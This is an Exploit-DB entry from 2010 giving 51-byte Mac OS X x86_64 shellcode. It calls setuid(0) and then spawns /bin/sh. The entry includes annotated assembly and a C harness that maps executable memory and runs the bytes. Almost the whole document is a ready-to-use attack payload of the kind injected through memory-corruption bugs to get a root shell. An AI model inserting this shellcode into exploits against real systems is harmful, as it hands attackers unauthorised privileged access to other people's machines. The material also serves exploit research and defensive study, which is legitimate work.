OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)

EDB-ID:

15618

CVE:

N/A




Platform:

OSX

Date:

2010-11-25


/*
 * Title:     OSX/Intel - setuid shell x86_64 - 51 bytes
 * Date:      2010-11-25
 * Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0
 * Author:    Dustin Schultz - twitter: @thexploit
 *
 * http://thexploit.com
 *
 * BITS 64
 *
 * section .text
 * global start
 *
 * start:
 * a:
 *  mov r8b, 0x02          ; Unix class system calls = 2
 *  shl r8, 24             ; shift left 24 to the upper order bits
 *  or r8, 0x17            ; setuid = 23, or with class = 0x2000017
 *  xor edi, edi           ; zero out edi
 *  mov rax, r8            ; syscall number in rax
 *  syscall                ; invoke kernel
 *  jmp short c            ; jump to c
 * b:
 *  pop rdi                ; pop ret addr which = addr of /bin/sh
 *  add r8, 0x24           ; execve = 59, 0x24+r8=0x200003b
 *  mov rax, r8            ; syscall number in rax
 *  xor rdx, rdx           ; zero out rdx
 *  push rdx               ; null terminate rdi, pushed backwards
 *  push rdi               ; push rdi = pointer to /bin/sh
 *  mov rsi, rsp           ; pointer to null terminated /bin/sh string
 *  syscall                ; invoke the kernel
 * c:
 *  call b                 ; call b, push ret of /bin/sh
 *  db '/bin//sh'          ; /bin/sh string
*/


#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";

int main(int argc, char **argv) {

	void *ptr = mmap(0, 0x33, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
			| MAP_PRIVATE, -1, 0);

	if (ptr == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	memcpy(ptr, shellcode, sizeof(shellcode));
	sc = ptr;

	sc();

	return 0;
}